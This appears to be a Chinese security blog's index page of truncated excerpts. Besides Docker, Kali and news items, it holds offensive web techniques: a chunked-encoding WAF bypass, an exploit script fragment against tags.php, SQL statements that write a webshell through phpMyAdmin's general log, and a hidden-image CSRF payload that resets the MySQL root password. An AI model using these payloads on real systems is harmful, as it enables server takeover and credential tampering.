像正常使用Python一样，去使用PentestBox里的Python

python -m pip install 模块名

-m ： 模块的方式

pip ： （管道），python内置的模块管理工具

[......]

继续阅读

####what is docker
Docker是一个开源的引擎，可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署，包括VMs（虚拟机）、bare metal、OpenStack 集群和其他的基础应用平台。

#####Docker通常用于如下场景：

web应用的自动化打包和发布；（我后面就会用到这个功能了额...）
自动化测试和持续集成、发布；
在服务型环境中部署和调整数据库或其他的后台应用；
#####一些名词解释

image：镜像，是指将应用打包之后的存储方式，一个image包含多层layer，每一步的结果产出变成文件
container：容器，指image在运行时，包含了文件资源（image展开）和系统资源（系统中的process）
Dockerfile：一种构造image的文件的DSL

[......]

继续阅读

技巧1 使用注释扰乱分块数据包
一些如Imperva、360等比较好的WAF已经对Transfer-Encoding的分块传输做了处理，可以把分块组合成完整的HTTP数据包，这时直接使用常规的分块传输方法尝试绕过的话，会被WAF直接识别并阻断。

我们可以在[RFC7230]中查看到有关分块传输的定义规范。

4.1.  Chunked Transfer Coding

   The chunked transfer coding wraps the payload body in order to
   transfer it as a series of chunks, eac[......]
继续阅读

利用脚本python：

#!/usr/bin/env python
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://192.168.1.9/tags.php"
data = {
"_FILES[mochazz][tmp_name[......]
继续阅读

央广网西安8月19日消息(记者温超陕西台记者拓紫云)据中国之声《新闻纵横》报道，近年来，比特币等虚拟货币以极其快速的资产价格涨幅，成为全球市场关注的焦点，而其安全问题也备受关注。据国外媒体报道称，仅在2018年上半年，“黑客”就窃取了价值7.31亿美元，约合人民币48亿元的加密货币。而在国内，西安警方日前成功破获一起网络“黑客”盗窃虚拟货币案件，涉案金额高达6亿元人民币。破获这起案件历时半年多，破案的经过如何？虚拟货币到底哪里不安全？持有虚拟货币又该注意哪些安全问题？

今年3月30日，西安市公安局经开分局接到一名张姓男子报警称，他的个人电脑疑似被非法入侵，大量虚拟货币一夜之间被洗劫一空，[......]

继续阅读

一、更新

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-[......]

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]
继续阅读

修改root密码：

保存为：webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为：www.webshell.cc

写文件

首先你要知道路径

保存为：webshell.html
[......]

继续阅读

以Windows 2003为例，启动Windows 2003组策略

点“开始”，在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键，此时可以看到一个“不要运行指定的Windows应用程序”选项，双击该选项，在“策略”选项卡中选择“启用”选项，启动Windows 2003禁止运行指定应用程序的功能，单击“不允许的应用程序的列表”中的“显示”按钮，打开列表框，在列表框中单击“添加”，打开“添加项目”窗口，然后在该窗口中输入需要禁止运行的程序名（可以不输入路径），比方说要禁用注册表编辑器，则输入 sethc.exe ，接着点击“确定”，即可禁止该应用程序的运行[......]

继续阅读

Burp已经成了绿帽子门必不可少的工具，相信大家都装有Java环境，本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀，然后可惜代码是个渣渣一直可望而不可即，后续随着公司业务增多，大多数目标都有WAF，于是就想写一款完全脱离工具，只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月，除了打飞机的时间基本就在写这货了，这里要感谢@MelodyZX  牛，在我完成大体框架后，帮了我不少大忙，包括完成虚拟终端，非常感谢。 程序采用java语言编写，数据库采用了sqlite，本来想使用access，但是在jdk1.8以后移除了该功[......]

继续阅读